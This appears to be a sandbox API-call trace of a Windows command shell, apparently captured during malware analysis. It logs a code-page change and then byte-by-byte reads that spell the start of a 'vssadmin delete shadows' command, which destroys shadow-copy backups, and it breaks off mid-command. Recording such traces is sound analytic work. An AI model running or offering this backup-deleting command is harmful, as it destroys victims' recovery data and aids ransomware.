(HeapHandle=0x2d0000, Flags=0x8, Size=0x12) returned 0x2e8940 [0263.654] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\mode.com", lpCommandLine="mode con cp select=1251", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x26f360*(cb=0x70, lpReserved=0x0, lpDesktop="Winsta0\\Default", lpTitle="mode con cp select=1251", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x26f310 | out: lpCommandLine="mode con cp select=1251", lpProcessInformation=0x26f310*(hProcess=0x54, hThread=0x50, dwProcessId=0x660, dwThreadId=0x664)) returned 1 [0264.127] CloseHandle (hObject=0x50) returned 1 [0264.127] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0264.127] GetProcessHeap () returned 0x2d0000 [0264.128] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e8aa0 | out: hHeap=0x2d0000) returned 1 [0264.128] GetEnvironmentStringsW () returned 0x2e8aa0* [0264.128] GetProcessHeap () returned 0x2d0000 [0264.128] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xafc) returned 0x2eb370 [0264.128] FreeEnvironmentStringsW (penv=0x2e8aa0) returned 1 [0264.128] LoadLibraryW (lpLibFileName="NTDLL.DLL") returned 0x77000000 [0264.128] GetProcAddress (hModule=0x77000000, lpProcName="NtQueryInformationProcess") returned 0x770514a0 [0264.128] NtQueryInformationProcess (in: ProcessHandle=0x54, ProcessInformationClass=0x0, ProcessInformation=0x26ec18, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x26ec18, ReturnLength=0x0) returned 0x0 [0264.128] ReadProcessMemory (in: hProcess=0x54, lpBaseAddress=0x7fffffdf000, lpBuffer=0x26ec50, nSize=0x380, lpNumberOfBytesRead=0x26ec10 | out: lpBuffer=0x26ec50*, lpNumberOfBytesRead=0x26ec10*=0x380) returned 1 [0264.128] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0264.834] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x26f258 | out: lpExitCode=0x26f258*=0x0) returned 1 [0264.834] CloseHandle (hObject=0x54) returned 1 [0264.834] _vsnwprintf (in: _Buffer=0x26f4c8, _BufferCount=0x13, _Format="%08X", _ArgList=0x26f268 | out: _Buffer="00000000") returned 8 [0264.834] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0264.834] GetProcessHeap () returned 0x2d0000 [0264.834] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2eb370 | out: hHeap=0x2d0000) returned 1 [0264.834] GetEnvironmentStringsW () returned 0x2ee9b0* [0264.834] GetProcessHeap () returned 0x2d0000 [0264.834] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xb22) returned 0x2ef4e0 [0264.834] FreeEnvironmentStringsW (penv=0x2ee9b0) returned 1 [0264.834] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0264.834] GetProcessHeap () returned 0x2d0000 [0264.834] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ef4e0 | out: hHeap=0x2d0000) returned 1 [0264.834] GetEnvironmentStringsW () returned 0x2ee9b0* [0264.834] GetProcessHeap () returned 0x2d0000 [0264.834] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xb22) returned 0x2ef4e0 [0264.834] FreeEnvironmentStringsW (penv=0x2ee9b0) returned 1 [0264.834] GetProcessHeap () returned 0x2d0000 [0264.834] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e8940 | out: hHeap=0x2d0000) returned 1 [0264.835] DeleteProcThreadAttributeList (in: lpAttributeList=0x26f328 | out: lpAttributeList=0x26f328) [0264.835] SetConsoleTitleW (lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 1 [0264.835] _get_osfhandle (_FileHandle=1) returned 0xf4 [0264.835] SetConsoleMode (hConsoleHandle=0xf4, dwMode=0x0) returned 0 [0264.835] _get_osfhandle (_FileHandle=1) returned 0xf4 [0264.835] GetConsoleMode (in: hConsoleHandle=0xf4, lpMode=0x4a18e194 | out: lpMode=0x4a18e194) returned 0 [0264.835] _get_osfhandle (_FileHandle=0) returned 0xe8 [0264.835] GetConsoleMode (in: hConsoleHandle=0xe8, lpMode=0x4a18e198 | out: lpMode=0x4a18e198) returned 0 [0264.836] GetConsoleOutputCP () returned 0x4e3 [0264.836] GetCPInfo (in: CodePage=0x4e3, lpCPInfo=0x4a19bfe0 | out: lpCPInfo=0x4a19bfe0) returned 1 [0264.837] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0264.837] GetProcessHeap () returned 0x2d0000 [0264.837] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e9d80 | out: hHeap=0x2d0000) returned 1 [0264.837] GetProcessHeap () returned 0x2d0000 [0264.837] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e9c60 | out: hHeap=0x2d0000) returned 1 [0264.837] GetProcessHeap () returned 0x2d0000 [0264.837] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e5bb0 | out: hHeap=0x2d0000) returned 1 [0264.837] GetProcessHeap () returned 0x2d0000 [0264.837] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2eb310 | out: hHeap=0x2d0000) returned 1 [0264.837] GetProcessHeap () returned 0x2d0000 [0264.837] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e9900 | out: hHeap=0x2d0000) returned 1 [0264.837] GetProcessHeap () returned 0x2d0000 [0264.837] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2eaae0 | out: hHeap=0x2d0000) returned 1 [0264.837] GetProcessHeap () returned 0x2d0000 [0264.837] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e6550 | out: hHeap=0x2d0000) returned 1 [0264.837] GetProcessHeap () returned 0x2d0000 [0264.837] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e4630 | out: hHeap=0x2d0000) returned 1 [0264.837] GetProcessHeap () returned 0x2d0000 [0264.837] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e9840 | out: hHeap=0x2d0000) returned 1 [0264.837] _vsnwprintf (in: _Buffer=0x4a1a6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x26f788 | out: _Buffer="\r\n") returned 2 [0264.837] _get_osfhandle (_FileHandle=1) returned 0xf4 [0264.837] GetFileType (hFile=0xf4) returned 0x3 [0264.838] _get_osfhandle (_FileHandle=1) returned 0xf4 [0264.838] WideCharToMultiByte (in: CodePage=0x4e3, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4a19c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0264.838] WriteFile (in: hFile=0xf4, lpBuffer=0x4a19c320*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x26f758, lpOverlapped=0x0 | out: lpBuffer=0x4a19c320*, lpNumberOfBytesWritten=0x26f758*=0x2, lpOverlapped=0x0) returned 1 [0264.838] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a18f360, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0264.838] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a19c0a0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0264.838] _vsnwprintf (in: _Buffer=0x4a18eb60, _BufferCount=0x3fe, _Format="%s", _ArgList=0x26f798 | out: _Buffer="C:\\Windows\\system32") returned 19 [0264.838] _vsnwprintf (in: _Buffer=0x4a18eb86, _BufferCount=0x3eb, _Format="%c", _ArgList=0x26f798 | out: _Buffer=">") returned 1 [0264.838] _get_osfhandle (_FileHandle=1) returned 0xf4 [0264.838] GetFileType (hFile=0xf4) returned 0x3 [0264.838] _get_osfhandle (_FileHandle=1) returned 0xf4 [0264.838] WideCharToMultiByte (in: CodePage=0x4e3, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32>", cchWideChar=-1, lpMultiByteStr=0x4a19c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32>", lpUsedDefaultChar=0x0) returned 21 [0264.838] WriteFile (in: hFile=0xf4, lpBuffer=0x4a19c320*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x26f788, lpOverlapped=0x0 | out: lpBuffer=0x4a19c320*, lpNumberOfBytesWritten=0x26f788*=0x14, lpOverlapped=0x0) returned 1 [0264.838] _get_osfhandle (_FileHandle=0) returned 0xe8 [0264.838] GetFileType (hFile=0xe8) returned 0x3 [0264.838] _get_osfhandle (_FileHandle=0) returned 0xe8 [0264.838] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0264.838] ReadFile (in: hFile=0xe8, lpBuffer=0x4a19c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26fa88, lpOverlapped=0x0 | out: lpBuffer=0x4a19c320*, lpNumberOfBytesRead=0x26fa88*=0x1, lpOverlapped=0x0) returned 1 [0264.838] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a19c320, cbMultiByte=1, lpWideCharStr=0x4a19e320, cchWideChar=1 | out: lpWideCharStr="vode con cp select=1251\n") returned 1 [0264.838] _get_osfhandle (_FileHandle=0) returned 0xe8 [0264.838] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0264.838] ReadFile (in: hFile=0xe8, lpBuffer=0x4a19c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26fa88, lpOverlapped=0x0 | out: lpBuffer=0x4a19c320*, lpNumberOfBytesRead=0x26fa88*=0x1, lpOverlapped=0x0) returned 1 [0264.838] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a19c320, cbMultiByte=1, lpWideCharStr=0x4a19e322, cchWideChar=1 | out: lpWideCharStr="sde con cp select=1251\n") returned 1 [0264.838] _get_osfhandle (_FileHandle=0) returned 0xe8 [0264.838] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0264.838] ReadFile (in: hFile=0xe8, lpBuffer=0x4a19c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26fa88, lpOverlapped=0x0 | out: lpBuffer=0x4a19c320*, lpNumberOfBytesRead=0x26fa88*=0x1, lpOverlapped=0x0) returned 1 [0264.838] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a19c320, cbMultiByte=1, lpWideCharStr=0x4a19e324, cchWideChar=1 | out: lpWideCharStr="se con cp select=1251\n") returned 1 [0264.838] _get_osfhandle (_FileHandle=0) returned 0xe8 [0264.838] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0264.838] ReadFile (in: hFile=0xe8, lpBuffer=0x4a19c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26fa88, lpOverlapped=0x0 | out: lpBuffer=0x4a19c320*, lpNumberOfBytesRead=0x26fa88*=0x1, lpOverlapped=0x0) returned 1 [0264.838] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a19c320, cbMultiByte=1, lpWideCharStr=0x4a19e326, cchWideChar=1 | out: lpWideCharStr="a con cp select=1251\n") returned 1 [0264.838] _get_osfhandle (_FileHandle=0) returned 0xe8 [0264.838] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0264.838] ReadFile (in: hFile=0xe8, lpBuffer=0x4a19c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26fa88, lpOverlapped=0x0 | out: lpBuffer=0x4a19c320*, lpNumberOfBytesRead=0x26fa88*=0x1, lpOverlapped=0x0) returned 1 [0264.838] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a19c320, cbMultiByte=1, lpWideCharStr=0x4a19e328, cchWideChar=1 | out: lpWideCharStr="dcon cp select=1251\n") returned 1 [0264.838] _get_osfhandle (_FileHandle=0) returned 0xe8 [0264.838] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0264.838] ReadFile (in: hFile=0xe8, lpBuffer=0x4a19c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26fa88, lpOverlapped=0x0 | out: lpBuffer=0x4a19c320*, lpNumberOfBytesRead=0x26fa88*=0x1, lpOverlapped=0x0) returned 1 [0264.839] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a19c320, cbMultiByte=1, lpWideCharStr=0x4a19e32a, cchWideChar=1 | out: lpWideCharStr="mon cp select=1251\n") returned 1 [0264.839] _get_osfhandle (_FileHandle=0) returned 0xe8 [0264.839] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0264.839] ReadFile (in: hFile=0xe8, lpBuffer=0x4a19c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26fa88, lpOverlapped=0x0 | out: lpBuffer=0x4a19c320*, lpNumberOfBytesRead=0x26fa88*=0x1, lpOverlapped=0x0) returned 1 [0264.839] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a19c320, cbMultiByte=1, lpWideCharStr=0x4a19e32c, cchWideChar=1 | out: lpWideCharStr="in cp select=1251\n") returned 1 [0264.839] _get_osfhandle (_FileHandle=0) returned 0xe8 [0264.839] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0264.839] ReadFile (in: hFile=0xe8, lpBuffer=0x4a19c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26fa88, lpOverlapped=0x0 | out: lpBuffer=0x4a19c320*, lpNumberOfBytesRead=0x26fa88*=0x1, lpOverlapped=0x0) returned 1 [0264.839] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a19c320, cbMultiByte=1, lpWideCharStr=0x4a19e32e, cchWideChar=1 | out: lpWideCharStr="n cp select=1251\n") returned 1 [0264.839] _get_osfhandle (_FileHandle=0) returned 0xe8 [0264.839] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0264.839] ReadFile (in: hFile=0xe8, lpBuffer=0x4a19c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26fa88, lpOverlapped=0x0 | out: lpBuffer=0x4a19c320*, lpNumberOfBytesRead=0x26fa88*=0x1, lpOverlapped=0x0) returned 1 [0264.839] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a19c320, cbMultiByte=1, lpWideCharStr=0x4a19e330, cchWideChar=1 | out: lpWideCharStr=" cp select=1251\n") returned 1 [0264.839] _get_osfhandle (_FileHandle=0) returned 0xe8 [0264.839] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0264.839] ReadFile (in: hFile=0xe8, lpBuffer=0x4a19c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26fa88, lpOverlapped=0x0 | out: lpBuffer=0x4a19c320*, lpNumberOfBytesRead=0x26fa88*=0x1, lpOverlapped=0x0) returned 1 [0264.839] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a19c320, cbMultiByte=1, lpWideCharStr=0x4a19e332, cchWideChar=1 | out: lpWideCharStr="dp select=1251\n") returned 1 [0264.839] _get_osfhandle (_FileHandle=0) returned 0xe8 [0264.839] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0264.839] ReadFile (in: hFile=0xe8, lpBuffer=0x4a19c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26fa88, lpOverlapped=0x0 | out: lpBuffer=0x4a19c320*, lpNumberOfBytesRead=0x26fa88*=0x1, lpOverlapped=0x0) returned 1 [0264.839] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a19c320, cbMultiByte=1, lpWideCharStr=0x4a19e334, cchWideChar=1 | out: lpWideCharStr="e select=1251\n") returned 1 [0264.839] _get_osfhandle (_FileHandle=0) returned 0xe8 [0264.839] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0264.839] ReadFile (in: hFile=0xe8, lpBuffer=0x4a19c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26fa88, lpOverlapped=0x0 | out: lpBuffer=0x4a19c320*, lpNumberOfBytesRead=0x26fa88*=0x1, lpOverlapped=0x0) returned 1 [0264.839] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a19c320, cbMultiByte=1, lpWideCharStr=0x4a19e336, cchWideChar=1 | out: lpWideCharStr="lselect=1251\n") returned 1 [0264.839] _get_osfhandle (_FileHandle=0) returned 0xe8 [0264.839] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0264.839] ReadFile (in: hFile=0xe8, lpBuffer=0x4a19c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26fa88, lpOverlapped=0x0 | out: lpBuffer=0x4a19c320*, lpNumberOfBytesRead=0x26fa88*=0x1, lpOverlapped=0x0) returned 1 [0264.839] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a19c320, cbMultiByte=1, lpWideCharStr=0x4a19e338, cchWideChar=1 | out: lpWideCharStr="eelect=1251\n") returned 1 [0264.839] _get_osfhandle (_FileHandle=0) returned 0xe8 [0264.839] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0264.839] ReadFile (in: hFile=0xe8, lpBuffer=0x4a19c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26fa88, lpOverlapped=0x0 | out: lpBuffer=0x4a19c320*, lpNumberOfBytesRead=0x26fa88*=0x1, lpOverlapped=0x0) returned 1 [0264.839] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a19c320, cbMultiByte=1, lpWideCharStr=0x4a19e33a, cchWideChar=1 | out: lpWideCharStr="tlect=1251\n") returned 1 [0264.839] _get_osfhandle (_FileHandle=0) returned 0xe8 [0264.839] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0264.839] ReadFile (in: hFile=0xe8, lpBuffer=0x4a19c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26fa88, lpOverlapped=0x0 | out: lpBuffer=0x4a19c320*, lpNumberOfBytesRead=0x26fa88*=0x1, lpOverlapped=0x0) returned 1 [0264.839] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a19c320, cbMultiByte=1, lpWideCharStr=0x4a19e33c, cchWideChar=1 | out: lpWideCharStr="eect=1251\n") returned 1 [0264.839] _get_osfhandle (_FileHandle=0) returned 0xe8 [0264.839] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0264.839] ReadFile (in: hFile=0xe8, lpBuffer=0x4a19c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26fa88, lpOverlapped=0x0 | out: lpBuffer=0x4a19c320*, lpNumberOfBytesRead=0x26fa88*=0x1, lpOverlapped=0x0) returned 1 [0264.839] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a19c320, cbMultiByte=1, lpWideCharStr=0x4a19e33e, cchWideChar=1 | out: lpWideCharStr=" ct=1251\n") returned 1 [0264.839] _get_osfhandle (_FileHandle=0) returned 0xe8 [0264.839] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0264.839] ReadFile (in: hFile=0xe8, lpBuffer=0x4a19c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26fa88, lpOverlapped=0x0 | out: lpBuffer=0x4a19c320*, lpNumberOfBytesRead=0x26fa88*=0x1, lpOverlapped=0x0) returned 1 [0264.839] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a19c320, cbMultiByte=1, lpWideCharStr=0x4a19e340, cchWideChar=1 | out: lpWideCharStr="st=1251\n") returned 1 [0264.839] _get_osfhandle (_FileHandle=0) returned 0xe8 [0264.839] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0264.840] ReadFile (in: hFile=0xe8, lpBuffer=0x4a19c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26fa88, lpOverlapped=0x0 | out: lpBuffer=0x4a19c320*, lpNumberOfBytesRead=0x26fa88*=0x1, lpOverlapped=0x0) returned 1 [0264.840] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a19c320, cbMultiByte=1, lpWideCharStr=0x4a19e342, cchWideChar=1 | out: lpWideCharStr="h=1251\n") returned 1 [0264.840] _get_osfhandle (_FileHandle=0) returned 0xe8 [0264.840] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0264.840] ReadFile (in: hFile=0xe8, lpBuffer=0x4a19c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26fa88, lpOverlapped=0x0 | out: lpBuffer=0x4a19c320*, lpNumberOfBytesRead=0x26fa88*=0x1, lpOverlapped=0x0) returned 1 [0264.840] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a19c320, cbMultiByte=1, lpWideCharStr=0x4a19e344, cchWideChar=1 | out: lpWideCharStr="a1251\n") returned 1 [0264.840] _get_osfhandle (_FileHandle=0) returned 0xe8 [0264.840] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0264.840] ReadFile (in: hFile=0xe8, lpBuffer=0x4a19c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26fa88, lpOverlapped=0x0 | out: lpBuffer=0x4a19c320*, lpNumberOfBytesRead=0x26fa88*=0x1, lpOverlapped=0x0) returned 1 [0264.840] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a19c320, cbMultiByte=1, lpWideCharStr=0x4a19e346, cchWideChar=1 | out: lpWideCharStr="d251\n") returned 1 [0264.840] _get_osfhandle (_FileHandle=0) returned 0xe8 [0264.840] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0264.840] ReadFile (in: hFile=0xe8, lpBuffer=0x4a19c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26fa88, lpOverlapped=0x0 | out: lpBuffer=0x4a19c320*, lpNumberOfBytesRead=0x26fa88*=0x1, lpOverlapped=0x0) returned 1 [0264.840] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a19c320, cbMultiByte=1, lpWideCharStr=0x4a19e348, cchWideChar=1 | out: lpWideCharStr="o51\n") returned 1 [0264.840] _get_osfhandle (_FileHandle=0) returned 0xe8 [0264.840] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0264.840] ReadFile (in: hFile=0xe8, lpBuffer=0x4a19c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26fa88, lpOverlapped=0x0 | out: lpBuffer=0x4a19c320*, lpNumberOfBytesRead=0x26fa88*=0x1, lpOverlapped=0x0) returned 1 [0264.840] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a19c320, cbMultiByte=1, lpWideCharStr=0x4a19e34a, cchWideChar=1 | out: lpWideCharStr="w1\n") returned 1 [0264.840] _get_osfhandle (_FileHandle=0) returned 0xe8 [0264.840] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0264.840] ReadFile (in: hFile=0xe8, lpBuffer=0x4a19c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26fa88, lpOverlapped=0x0 | out: lpBuffer=0x4a19c320*, lpNumberOfBytesRead=0x26fa88*=0x1, lpOverlapped=0x0) returned 1 [0264.840] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a19c320, cbMultiByte=1, lpWideCharStr=0x4a19e34c, cchWideChar=1 | out: lpWideCharStr="s\n") returned 1 [0264.840] _get_osfhandle (_FileHandle=0) returned 0xe8 [0264.840] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0264.840] ReadFile (in: hFile=0xe8, lpBuffer=0x4a19c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26fa88, lpOverlapped=0x0 | out: lpBuffer=0x4a19c320*, lpNumberOfBytesRead=0x26fa88*=0x1, lpOverlapped=0x0) returned 1 [0264.840] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a19c320, cbMultiByte=1, lpWideCharStr=0x4a19e34e, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0264.840] _get_osfhandle (_FileHandle=0) returned 0xe8 [0264.840] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0264.840] ReadFile (in: hFile=0xe8, lpBuffer=0x4a19c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26fa88, lpOverlapped=0x0 | out: lpBuffer=0x4a19c320*, lpNumberOfBytesRead=0x26fa88*=0x1, lpOverlapped=0x0) returned 1 [0264.840] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a19c320, cbMultiByte=1, lpWideCharStr=0x4a19e350, cchWideChar=1 | out: lpWideCharStr="/") returned 1 [0264.840] _get_osfhandle (_FileHandle=0) returned 0xe8 [0264.840] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0264.840] ReadFile (in: hFile=0xe8, lpBuffer=0x4a19c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x26fa88, lpOverlapped=0x0 | out: lpBuffer=0x4a19c320*, lpNumberOfBytesRead=0x26fa88*=0x1, lpOverlapped=0x0) returned 1 [0264.840] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a19c320, cbMultiByte=1, lpWideCharStr=0x4a19e352, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0264.840] _get_osfhandle (_FileHandle=0) returned 0xe8 [0264.840] 